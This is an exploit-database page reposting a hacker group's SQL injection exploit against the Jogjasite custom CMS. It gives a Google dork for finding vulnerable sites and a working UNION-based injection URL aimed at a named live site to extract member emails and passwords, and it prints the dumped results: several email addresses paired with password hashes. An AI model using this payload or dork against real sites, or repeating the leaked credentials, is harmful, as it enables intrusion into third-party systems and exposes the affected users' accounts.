Advertisement






Custom CMS Jogjasite - SQL-Injection Vulnerability

CVE Category Price Severity
N/A CWE-89 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2021-02-05
CPE
cpe:cpe:/a:jogjasite:custom-cms
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.7456 0.94275

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021020015

Below is a copy:

Custom CMS Jogjasite - SQL-Injection Vulnerability
#############################################################
# Exploit Title: Custom CMS Jogjasite - SQL-Injection Vulnerability
# Exploit Author: Gh05t666nero
# Author Team: IndoGhostSec
# Google Dork: intext:"By jogjasite.com"
# Software Vendor: jogjasite.com
# Software Version: *
# Software Link: N/A
# Tested on: Linux gh05t666nero 5.10.0-kali2-686-pae #1 SMP Debian 5.10.9-1kali1 (2021-01-22) i686 GNU/Linux
# Date: 2021-02-05

#############################################################
[*] Information:

Jogjasite is a custom website creation service, namely web design services and web programming services according to your wishes and needs. But, they program the site so unsatisfactory that it leaves some vulnerabilities.

#############################################################
[*] Exploit:

-

#############################################################
[*] Demo:

https://sonjucomputerjogja.com/kategori-12'+AND+0+UNION+SELECT+1,2,3,(/*!50000SELECT*/(@x)FROM(/*!50000SELECT*/(@x:=0x00),(/*!50000SELECT*/(@x)FROM(memberarea)WHERE(@x)IN(@x:=/*!50000CONCAT*/(0x20,@x,email,0x203a3a20,password,0x3c62723e))))x),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+--accessories

[email protected] :: 5a06cc059b39d1b3508efe00d044db05
[email protected] :: ca5c40c1e33d5309ab72ff31278a330a
[email protected] :: fb882e63aef3468637787d2ed310602f
[email protected] :: ff332ac34eb7fc59519013e9d2b7474f
[email protected] :: 8f4f3b665a576448fc9ce34a34c916af
[email protected] :: 346f67beda8b6aaf5bceeeffe5fab5c1

#############################################################
[*] Contact:

# Instagram: instagram.com/ojan_.py
# Telegram : t.me/Gh05t666nero
# Twitter: twitter.com/Gh05t666nero1
# Blogger: anonsec.my.id
# E-mail : [email protected]

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.